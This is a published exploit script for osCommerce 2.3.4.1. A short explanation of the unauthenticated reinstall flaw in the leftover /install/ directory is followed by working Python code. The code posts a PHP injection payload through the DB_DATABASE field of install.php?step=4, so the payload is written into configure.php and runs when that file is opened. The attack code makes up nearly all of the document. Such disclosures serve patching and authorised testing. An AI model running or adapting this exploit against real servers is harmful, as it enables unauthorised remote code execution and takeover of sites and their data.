osCommerce 2.3.4.1 Remote Code Execution

`# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution  
# Date: 29.0.3.2018  
# Exploit Author: Simon Scannell - https://scannell-infosec.net <[email protected]>  
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable  
# Tested on: Linux, Windows  
  
# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible  
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page  
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly  
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject  
# PHP code into the config file and then simply executing the code by opening it.  
  
  
import requests  
  
# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)  
base_url = "http://localhost//oscommerce-2.3.4.1/catalog/"  
target_url = "http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4"  
  
data = {  
'DIR_FS_DOCUMENT_ROOT': './'  
}  
  
# the payload will be injected into the configuration file via this code  
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .  
# so the format for the exploit will be: '); PAYLOAD; /*  
  
payload = '\');'  
payload += 'system("ls");' # this is where you enter you PHP payload  
payload += '/*'  
  
data['DB_DATABASE'] = payload  
  
# exploit it  
r = requests.post(url=target_url, data=data)  
  
if r.status_code == 200:  
print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")  
else:  
print("[-] Exploit did not execute as planned")  
  
`